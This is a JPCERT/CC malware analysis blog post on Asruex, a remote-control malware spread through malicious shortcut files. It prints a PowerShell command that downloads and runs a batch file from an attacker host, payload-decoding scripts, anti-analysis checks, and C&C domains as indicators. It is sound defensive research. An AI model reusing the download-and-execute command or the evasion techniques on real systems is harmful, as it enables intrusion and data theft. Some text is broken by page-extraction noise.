**[« Classifying Malware using Import API and Fuzzy Hashing – impfuzzy – | Main](http://blog.jpcert.or.jp/2016/05/classifying-mal-a988.html)** **Jun 30, 2016** # Asruex: Malware Infecting through Shortcut Files **JPCERT/CC has been observing malicious shortcut files that are sent as email** **attachments to a limited range of organisations since around October 2015. When this** **shortcut file is opened, the host will be infected with malware called “Asruex”. The** **malware has a remote controlling function, and attackers sending these emails seem to** **attempt intruding into the targets’ network using the malware. According to a blog article** **by Microsoft, the malware is associated with an attacker group identified as “DarkHotel”** **[1]. This blog entry will introduce the details of Asruex.** **Infection Mechanism of Asruex** **Figure 1 describes the chain of events after a victim opens the malicious shortcut file until** **the host gets infected with Asruex.** **Figure 1: Chain of events after a victim opens the malicious shortcut file until the** **host gets infected with Asruex** **For those cases that JPCERT/CC has observed, when the shortcut file is opened, a** **downloader is downloaded from a C&C server and then executed. The downloader then** **downloads Asruex from another C&C server, which is then executed. Detailed behaviour** **observed in each phase will be explained in the next section.** **Details of the Shortcut File** **When the malicious shortcut file is opened, the following PowerShell command in the file** **is executed.** **powershell -windowstyle hidden $c='(new-object System.Net.WebClient).D'+'ownloadFile("""http://online-** **dropbox.com/online/a """, """$env:tmp\gst.bat""")';Invoke-Expression** **$c&%tmp%\gst.bat "%CD%"** **The above PowerShell command downloads a file from the specified URL, and it is saved** **as a batch file to be executed. The batch file contains the following commands, which** **execute PowerShell scripts (marked in red).** **R** **E** **C** **E** **N** **Asruex: Malware Infecting through** **Shortcut Files** **Classifying Malware using Import API and** **Fuzzy Hashing – impfuzzy –** **[Decoding Obfuscated Strings in Adwind](http://blog.jpcert.or.jp/2016/05/decoding-obfuscated-strings-in-adwind.html)** **[Workshop and Training in Congo](http://blog.jpcert.or.jp/2016/05/workshop-and-training-in-congo.html)** **[Some coordinated vulnerability](http://blog.jpcert.or.jp/2016/05/some-coordinated-vulnerability-disclosures-in-april-2016.html)** **disclosures in April 2016** **[PHP Files in CMS, Targeted for Alteration](http://blog.jpcert.or.jp/2016/04/php-files-in-cms-targeted-for-alteration.html)** **[Experience in MNSEC 2015, Ulaanbaatar](http://blog.jpcert.or.jp/2016/03/experience-in-mnsec-2015-ulaanbaatar.html)** **[Banking Trojan “Citadel” Returns](http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html)** **[Windows Commands Abused by Attackers](http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html)** **Malware Analysis Training Course at** **Security Camp Japan 2015** **C** **A** **T** **E** **G** **[#APCERT](http://blog.jpcert.or.jp/apcert/)** **[#FIRST](http://blog.jpcert.or.jp/first/)** **[#Incident management](http://blog.jpcert.or.jp/incident_management/)** ## #JPCERT news #Threats **[#Trends in Japan](http://blog.jpcert.or.jp/trends/)** **[#Tsubame](http://blog.jpcert.or.jp/tsubame/)** **[#Vulnerabilities](http://blog.jpcert.or.jp/vulnerabilities/)** **[Africa](http://blog.jpcert.or.jp/africa/)** **[India](http://blog.jpcert.or.jp/india/)** **[Indonesia](http://blog.jpcert.or.jp/indonesia/)** **[Laos](http://blog.jpcert.or.jp/laos/)** **[Mongolia](http://blog.jpcert.or.jp/mongolia/)** **[Myanmar](http://blog.jpcert.or.jp/myanmar/)** **[Pacific Islands](http://blog.jpcert.or.jp/pac/)** **[Sri Lanka](http://blog.jpcert.or.jp/srilanka/)** **[Thailand](http://blog.jpcert.or.jp/thai/)** **A** **C** **C** **E** **S** **[Windows Commands Abused by Attackers](http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html)** **Classifying Malware using Import API and** **Fuzzy Hashing – impfuzzy –** **[Banking Trojan “Citadel” Returns](http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html)** **Analysis of a Recent PlugX Variant - “P2P** **PlugX”** **[PoisonIvy adapts to communicate](http://blog.jpcert.or.jp/2015/07/poisonivy-adapts-to-communicate-through-authentication-proxies.html)** **through Authentication Proxies** **A New UAC Bypass Method that Dridex** **Uses** **Asruex: Malware Infecting through** **Shortcut Files** **[PHP Files in CMS, Targeted for Alteration](http://blog.jpcert.or.jp/2016/04/php-files-in-cms-targeted-for-alteration.html)** **[Decoding Obfuscated Strings in Adwind](http://blog.jpcert.or.jp/2016/05/decoding-obfuscated-strings-in-adwind.html)** **[Decrypting Strings in Emdivi](http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html)** **L** **I** **N** **K** **S** **[JPCERT homepage](http://www.jpcert.or.jp/english/)** **[Follow us @jpcert_en](http://twitter.com/jpcert_en)** **RSS feed** **[Contributor info](http://blog.jpcert.or.jp/authours.html)** **A** **R** **C** **H** **I** **[June 2016](http://blog.jpcert.or.jp/2016/06/)** **[May 2016](http://blog.jpcert.or.jp/2016/05/)** **[April 2016](http://blog.jpcert.or.jp/2016/04/)** ----- **del /f %1\*.*.lnk** **echo** **powershell -Enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMA…** **"%tmp%\dwm.exe"** **When the batch file is executed, a Windows executable file (a downloader) and a dummy** **file for display will be downloaded from a C&C server, saved in %TEMP% folder and then** **executed. Those decoy documents are written in Japanese, but some are also in** **Chinese, which implies that the target for this attack is not limited to Japanese** **organisations.** **Details of the Downloader** **When the downloader is executed, it downloads a .jpg or .gif image file. Encoded Asruex** **is contained in the latter part of the image file. The downloader decodes it and then** **executes the malware.** **Figure 2: An Image File Containing Encoded Asruex** **Asruex contained in the image file is encoded using XOR. The following Python script is** **used for decoding the encoded data of the image file. The size of the encoded data is** **specified in the last 4 bytes of the image file.** **key = 0x1D # Keys may vary depending on the sample** **for i in range(0, length):** **buf[i] = chr(ord(buf[i]) ^ key)** **key += 0x5D** **key &=0xff** **The downloader may contain an encoded executable file of Process Hacker (a multi-** **function task manager), and it may execute the Process Hacker if an anti-virus software is** **detected. Anti-virus software such as by Symantec, McAfee and Kaspersky, etc., are** **detected based on the process names.** **Details of Asruex** **Asruex is a kind of malware that communicates with the C&C server over HTTP, and** **executes the command received through the communication. It has various anti-analysis** **features such as preventing the malware from running when it detects a virtual machine.** **Please refer to Appendix A for conditions which Asruex detects a virtual machine. The** **malware is also capable of detecting anti-virus software.** **If Asruex does not detect a virtual machine, it executes one of the following executable** **files, and injects a DLL file which is contained in Asruex. In case where it detects anti-** **virus software, Asruex generates a DLL file and loads it to itself (but does not perform** **DLL injection). This DLL file contains the core functions of Asruex.** **sdiagnhost.exe** **wksprt.exe** **taskhost.exe** **dwm.exe** **winrshost.exe** **wsmprovhost.exe** **ctfmon.exe** **explorer.exe** **The DLL injected, or generated and loaded, sends an HTTP request to a dummy host. If it** **receives a reply of status code that is 100 or greater it connects to an actual C&C server** **[January 2016](http://blog.jpcert.or.jp/2016/01/)** **[December 2015](http://blog.jpcert.or.jp/2015/12/)** **[November 2015](http://blog.jpcert.or.jp/2015/11/)** **[October 2015](http://blog.jpcert.or.jp/2015/10/)** **[September 2015](http://blog.jpcert.or.jp/2015/09/)** **[More...](http://blog.jpcert.or.jp/archives.html)** **C** **A** **T** **E** **G** **[#APCERT](http://blog.jpcert.or.jp/apcert/)** **[#FIRST](http://blog.jpcert.or.jp/first/)** **[#Incident management](http://blog.jpcert.or.jp/incident_management/)** **[#JPCERT news](http://blog.jpcert.or.jp/jpcert_news/)** **[#Threats](http://blog.jpcert.or.jp/threats/)** **[#Trends in Japan](http://blog.jpcert.or.jp/trends/)** **[#Tsubame](http://blog.jpcert.or.jp/tsubame/)** **[#Vulnerabilities](http://blog.jpcert.or.jp/vulnerabilities/)** **[Africa](http://blog.jpcert.or.jp/africa/)** **[India](http://blog.jpcert.or.jp/india/)** **[Indonesia](http://blog.jpcert.or.jp/indonesia/)** **[Laos](http://blog.jpcert.or.jp/laos/)** **[Mongolia](http://blog.jpcert.or.jp/mongolia/)** **[Myanmar](http://blog.jpcert.or.jp/myanmar/)** **[Pacific Islands](http://blog.jpcert.or.jp/pac/)** **[Sri Lanka](http://blog.jpcert.or.jp/srilanka/)** **[Thailand](http://blog.jpcert.or.jp/thai/)** ----- **p** **Content-Type: text/plain; charset=utf-8** **Accept: */*** **User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116** **Safari/537.36** **Host: [host name]** **Asruex operates based on the configuration information stored in itself. The configuration** **Information includes C&C servers and dummy hosts that it connects to, and also version** **information and a key to decode data which is delivered. For further details on the** **configuration information, please refer to Appendix B.** **The configuration information is encoded. It can be decoded with the following Python** **code:** **(config_size,) = struct.unpack("=I", data[offset:offset+4])** **config_offset = offset + 4** **encode_config = data[config_offset:config_offset+config_size]** **i = 0** **seed = config_size * 2 // It does not necessarily double** **while i < config_size:** **(result, seed) = rand_with_seed(seed)** **result &= 0xff** **decode_data.append(chr(ord(encode_config[i]) ^ result))** **i += 1** **decode_config = "".join(decode_data)** **(decode_size,) = struct.unpack("=I", decode_config[config_size-4:config_size])** **config = lznt1_decompress(decode_config, config_size, decode_size)** **Asruex executes commands that are received from a C&C server. Commands that are** **possibly executed are listed in Table 1. Most of the commands are used for collecting** **information, but some are for downloading DLL files (AdvProv.dll) from C&C servers and** **for executing them. AdvProv.dll is a plug-in to expand functions of Asruex.** **Table 1: Commands used by Asruex** **Command** **Function** **1** **Collect information of infected hosts** **2** **Obtain process list** **3** **Obtain file list** **4** **Change waiting time** **5** **Obtain version information** **6** **Uninstall** **501** **Obtain folder list** **502** **Load DLL** **-** **Execute external DLL (AdvProv.dll)** **Details of AdvProv.dll** **AdvProv.dll is encrypted using XOR and 3DES. Decryption key is calculated based on the** **destination URL and the encoding key of the configuration information. Asruex downloads** **a DLL, loads it into the memory and executes DLL’s export function, Get_CommandProc.** **AdvProv.dll adds the following commands to Asruex:** **Table 2: Asruex Commands added by** |Command|Function| |---|---| |1|Collect information of infected hosts| |2|Obtain process list| |3|Obtain file list| |4|Change waiting time| |5|Obtain version information| |6|Uninstall| |501|Obtain folder list| |502|Load DLL| |-|Execute external DLL (AdvProv.dll)| |Col1|AdvProv.dll| |---|---| |Command|Function| |101|Download| |102|Copy a file| |103|Change a file name| |104|Change file time| |105|Delete a file| |106|Terminate a process| |107|Search a registry| ----- |109|Create a registry entry| |---|---| |110|Show a registry entry| |111|Delete a registry entry| |112|Update| |601|Download and execute a file| **Samples of AdvProv.dll that JPCERT/CC has observed had the listed functions. However,** **there may be some other versions with different functions.** **Summary** **Asruex is a relatively new kind of malware that has been seen since around October** **2015. It is likely that targeted attacks using Asruex will continue.** **Hash values of artifacts demonstrated in this article are described in Appendix C. Also,** **destination URLs confirmed by JPCERT/CC are listed in Appendix D. It is recommended** **to make sure that the hosts you use are not accessing these URLs.** **Thanks for reading.** **- Shusei Tomonaga** **_(Translated by Yukako Uchida)_** **Reference** **[1] Microsoft - Reverse-engineering DUBNIUM** **https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-** **dubnium-2/** **Appendix A: Conditions where Asurex detects an analysis environment** **If Asruex detects itself being operated in an environment under any of the following** **conditions (Table A-1 to A-6), it recognises that it is an analysis environment and stops** **running.** **Table A-1: The user matches the computer name and user name as listed.** **Table A-2: Listing up the loaded modules, and if the listed functions are found to be** **exported.** **Table A-3: The listed file names are found.** **Table A-4: The listed process names are running.** **Table A-5: Listing up the process modules that are running, and the module version** **matches the combination listed.** **Table A-6: The disk name contains the listed strings.** **Table A-1: Detectable Combination of** **Computer Name and User Name** |Computer Name|User Name| |---|---| |BRBRB-D8FB22AF1|antonie| |ANTONY-PC|Antony| |TEQUILABOOMBOOM|janettedoe| |HBXPENG|makrorechner| |IOAVM|Administrator| |XANNY|Administrator| |NONE-DUSEZ58JO1|Administrator| ----- |HOME-OFF-D5F0AC|Dave| |---|---| |DELL-D3E64F7E26|Administrator| |JONATHAN-C561E0|Administrator| |HANS|HanueleBaser| |IePorto|Administrator| **Table A-2: Detectable Functions** **Functions** **_SbieDll_Hook@12** **_SbieApi_QueeryProcessPath@28** **hook_api** **New2_CreateProcessInternalW@48** **Table A-3: Detectable** **File Names** **File Names** **\\.\pipe\cuckoo** **[System Drive]:\cuckoo** **Table A-4:** **Detectable** **Process Names** **Process Names** **Filemon.exe** **Regmon.exe** **Procmon.exe** **Tcpview.exe** **wireshark.exe** **dumpcap.exe** **regshot.exe** **cports.exe** **smsniff.exe** **SocketSniff.exe** **Table A-5: Detectable Combinations of File Version Information** |FileDescription|CompanyName| |---|---| |Sysinternals|| |SysinternalsRegistryMonitor|Sysinternals| |ProcessMonitor|Sysinternals| |TCP/UDPendpointviewer|Sysinternals| |Wireshark|TheWiresharkdevelopercommunity| |Dumpcap|TheWiresharkdevelopercommunity| |Regshot|RegshotTeam| |CurrPorts|NirSoft| |SmartSniff|NirSoft| |SocketSniff|NirSoft| ----- **Disk Name** **vmware** **Virtual HD** **MS VirtualSCSI Disk Device** **Appendix B: Configuration Information** **Table B-1: List of Configuration Information** **Offset** **Length** **Description** **0x000** **16** **ID** **0x010** **4** **Version Information** **0x014** **256** **Install Path** **0x114** **64 * 3** **Dummy URLs to connect to × 3** **0x1D4** **256 * 3** **HTTP Access URLs × 3** **0x4D4** **256** **Sending data store path 1** **0x5D4** **64** **Sending data strings 1** **0x614** **256** **Sending data store path 2** **0x714** **64** **Sending data strings 2** **0x754** **64** **Encode key** **0x794** **4** **Suspension time** **0x798** **256 * 3** **File name × 3** **0xA98** **4** **Machine information (pointer)** **0xA9C** **4** **Connect destination (pointer)** **0xAA0** **4** **Not in use** **Encode keys** **blackolive** **darktea** **12qw@#WE** **Appendix C: SHA-256 Hash Value of Artifacts** **Shortcut files:** **c60a93a712d0716a04dc656a0d1ba06be5047794deaa9769a2de5d0fcf843c2a** **ae421dd24306cbf498d4f82b650b9162689e6ef691d53006e8f733561d3442e2** **980cc01ec7b2bd7c1f10931822c7cfe2a04129588caece460e05dcc0bb1b6c34** **b175567800d62dcb00212860d23742290688cce37864930850522be586efa882** **c2e99eedf555959721ef199bf5b0ac7c68ea8205d0dff6c208adf8813411a456** **ac63703ea1b36358d2bec54bddfef28f50c635d1c7288c2b08cceb3608c1aa27** **5cfc67945dd39885991131f49f6717839a3541f9ba141a7a4b463857818d01e6** **e76c37b86602c6cc929dffe5df7b1056bff9228dde7246bf4ac98e364c99b688** **606e98df9a206537d35387858cff62eb763af20853ac3fa61aee8f3c280aaafe** **Downloaders:** **fdf3b42ac9fdbcabc152b200ebaae0a8275123111f25d4a68759f8b899e5bdd6** **dd2cba1a0d54a486a39f63cbd4df6129755a84580c21e767c44c0a7b60aff600** **d89e2cc604ac7da05feeb802ed6ec78890b1ef0a3a59a8735f5f772fc72c12ef** **caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8** **8ca8067dfef13f10e657d299b517008ad7523aacf7900a1afeb0a8508a6e11d3** **77ca1148503def0d8e9674a37e1388e5c910da4eda9685eabe68fd0ee227b727** **05f241784e673f2af8a2a423fb66e783a97f123fc3d982144c39e92f191d138d** **a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827** **2273236013c1ae52bfc6ea327330a4eba24cc6bc562954854ae37fe55a78310b** **36581 19160f2 06 617 7 555 d8** **3280692442fd81bd 3d47 59** **2b 09** |Table|B-1: List|of Configuration Information| |---|---|---| |Offset|Length|Description| |0x000|16|ID| |0x010|4|Version Information| |0x014|256|Install Path| |0x114|64 * 3|Dummy URLs to connect to × 3| |0x1D4|256 * 3|HTTP Access URLs × 3| |0x4D4|256|Sending data store path 1| |0x5D4|64|Sending data strings 1| |0x614|256|Sending data store path 2| |0x714|64|Sending data strings 2| |0x754|64|Encode key| |0x794|4|Suspension time| |0x798|256 * 3|File name × 3| |0xA98|4|Machine information (pointer)| |0xA9C|4|Connect destination (pointer)| |0xAA0|4|Not in use| ----- **3f2168a9a51d6d6fe74273ebfc618ded3957c33511435091885fa8c5f854e11e** **df72a289d535ccf264a04696adb573f48fe5cf27014affe65da8fd98750029db** **eacc46f54fa8c8a8cf51368305803d949fa2625066ec634da9a41d08f2855617** **e139a8916f99ce77dbdf57eaeac5b5ebe23367e91f96d7af59bee7e5919a7a81** **8a6d76bd21e70a91abb30b138c12d0f97bb4971bafa072d54ce4155bea775109** **35fc95ec78e2a5ca3c7a332db9ca4a5a5973607a208b9d637429fe1f5c760dd5** **Asruex:** **8af41d303db8a975759f7b35a236eb3e9b4bd2ef65b070d19bd1076ea96fa5c4** **a9ce1f4533aeec680a77d7532de5f6b142eb8d9aec4fdbe504c37720befe9ce3** **9350f7eb28f9d72698216105c51a4c5ad45323f907db9936357d6914fc992c90** **694de22c0b1a45c0e43caaa91486bc71a905443b482f2d22ded16b5ce3b0e738** **18e12feeb3fb4117ca99e152562eada2eb057c09aab8f7a424e6d889f70feb6c** **148a834e2717d029a4450dfa7206fd7d36c420edb95068c57766da0f61b288e8** **d869ce2ba491713e4c3f405ad500245d883b0e7b66abeee2522e701c8493388a** **fca19a78fc71691f3f97808624b24f00dd1f19ccadcc6e3a7e2be5b976d8937b** **eb31f931f0e2abf340f3f95861a51e30677fd4216b2e4ee4d8570b41cb41249c** **7a95930aa732d24b4c62191247dcdc4cb483d8febaab4e21ca71fec8f29b1b7c** **AdvProv.dll** **f06000dceb4342630bf9195c2475fcd822dfe3910b0fa21691878071d0bb10fc** **Others** **6d4e7d190f4d7686fd06c823389889d226ea9c8524c82c59a765bba469f2f723** **e7d51bb718c31034b597aa67408a015729be85fc3aefcc42651c57d673a4fe5a** **7074a6d3ab049f507088e688c75bae581fad265ebb6da07b0efd789408116ec8** **Appendix D: Hosts that Asruex connects to** **vodsx.net** **office365-file.com** **service365-team.com** **datainfocentre.com** **eworldmagazine.org** **supportservice247.com** **seminarinfocenter.net** **vdswx.net** **housemarket21.com** **product-report24.com** **requestpg.net** **secu-docu.net** **send-error.net** **send-form.net** **wzixx.net** **login-confirm.com** **2.gp** **2.ly** **online-dropbox.com** **sendspaces.net** **institute-secu.org** **pb.media-total.org** **response-server.com** **enewscenters.com** **sbidnest.com** **servicemain.com** **[Posted on Jun 30, 2016 in #Threats, #Trends in Japan | Permalink](http://blog.jpcert.or.jp/threats/)** -----